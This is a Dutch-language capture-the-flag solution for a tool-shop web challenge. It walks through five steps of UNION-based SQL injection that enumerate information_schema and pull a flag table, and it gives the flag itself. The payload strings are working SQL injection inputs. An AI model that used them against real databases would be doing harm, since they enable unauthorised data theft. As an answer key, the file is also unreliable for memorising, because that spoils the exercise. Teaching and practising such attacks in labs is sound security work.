# GereedschapShop

## solution
----------- Path to flag: -----------
1.  komt alle producten uit van “product table” terug
        ';--

2.  Op deze stap gaat speler even blind injection doen (gokken) of hij iets meer uit database terug kan vragen door “UNION”
        hamer' UNION (SELECT 1,2 FROM dual);--

3.  Aangezien de vorige stap succesvol was, kan de speler alle "Tables name" terug vragen.
        hamer' UNION (SELECT TABLE_NAME, TABLE_SCHEMA FROM information_schema.tables);--

4.  De speler heeft de naam van de “CtfFlag” table uit de vorige fase al bereikt, die nu zijn columns kan vinden. Dat ze “flagid” en “flag” zou zijn
        hamer' UNION (SELECT COLUMN_NAME, 2 FROM information_schema.columns WHERE TABLE_NAME = 'CtfFlag');--

5.  In de laatste stap kan de speler eenvoudig de vlag opvragen uit twee columnen van flagid en flag.
        hamer' UNION (SELECT flagid, flag FROM CtfFlag);--

flag: flag{2zf3cZFd}